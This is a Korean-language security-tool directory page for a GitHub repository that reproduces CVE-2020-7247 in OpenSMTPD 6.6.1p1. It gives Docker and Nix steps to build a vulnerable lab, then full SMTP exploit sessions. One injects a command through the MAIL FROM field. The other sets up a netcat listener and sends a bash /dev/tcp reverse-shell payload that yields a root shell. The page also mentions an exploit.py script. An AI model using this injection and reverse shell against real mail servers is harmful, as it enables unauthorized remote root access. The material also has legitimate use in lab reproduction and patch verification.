Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-7247-reproducer | Kitploit
도구/GitHubGitHub/minhluannguyen/cve-2020-7247-reproducer
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubminhluannguyen/cve-2020-7247-reproducer

CVE-2020-7247-reproducer

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
11년 전아직 검토되지 않음

CVE-2020-7247 (OpenSMTPD)

정보

이 저장소에는 취약한 OpenSMTPD(6.6.1p1) 환경을 포함하는 Docker 이미지를 빌드하는 데 필요한 파일이 들어 있습니다. 이 취약점을 통해 공격자는 특수하게 조작된 SMTP 세션, 특히 MAIL FROM 필드를 통해 임의의 명령을 실행할 수 있습니다.

사용법

  1. Docker 이미지 빌드 (Debian 기반):
root@kitploit:~
docker build -t opensmtpd-vuln -f Dockerfile .
docker run -it --rm --name opensmtpd-vuln-test opensmtpd-vuln /bin/bash
smtpd -dv
  1. Nix 이미지 빌드:
root@kitploit:~
nix-build opensmtpd-vuln.nix
docker load < result
docker run -it --rm opensmtpd-vuln-nix /bin/bash
smtpd -dv

익스플로잇

  1. 취약점 공격:

3.1. 임의의 명령 실행:

root@kitploit:~
$nc 172.17.0.2 25
220 debian ESMTP OpenSMTPD
HELO toto  
250 debian Hello toto [172.17.0.1], pleased to meet you
MAIL FROM:<;touch secret.txt;>
250 2.0.0 Ok
RCPT TO:<[email protected]>
250 2.1.5 Destination address valid: Recipient ok
data
354 Enter mail, end with "." on a line by itself

Hello Bonjour Xin chào
.
250 2.0.0 09cb8342 Message accepted for delivery
QUIT
221 2.0.0 Bye

3.2. 리버스 셸 획득:

리스너 설정:

root@kitploit:~
nc -lnvp 8080

exploit.py 스크립트를 실행합니다 (다른 터미널에서):

root@kitploit:~
python3 exploit.py

또는 수동으로 수행합니다:

root@kitploit:~
$nc 172.17.0.2 25
220 debian ESMTP OpenSMTPD
HELO toto  
250 debian Hello toto [172.17.0.1], pleased to meet you
MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
250 2.0.0 Ok
RCPT TO:<[email protected]>
250 2.1.5 Destination address valid: Recipient ok
data
354 Enter mail, end with "." on a line by itself

#0
#1
#2
#3
#4
#5
#6
#7
#8
#9
#a
#b
#c
#d
sh -c 'echo "bash -i >& /dev/tcp/172.17.0.1/8080 0>&1" | bash'
.
250 2.0.0 09cb8342 Message accepted for delivery
QUIT
221 2.0.0 Bye

이제 호스트 머신에서 root 권한의 셸을 얻을 수 있습니다.

참고 자료

  • OpenSMTPD
  • NVD
도구 다운로드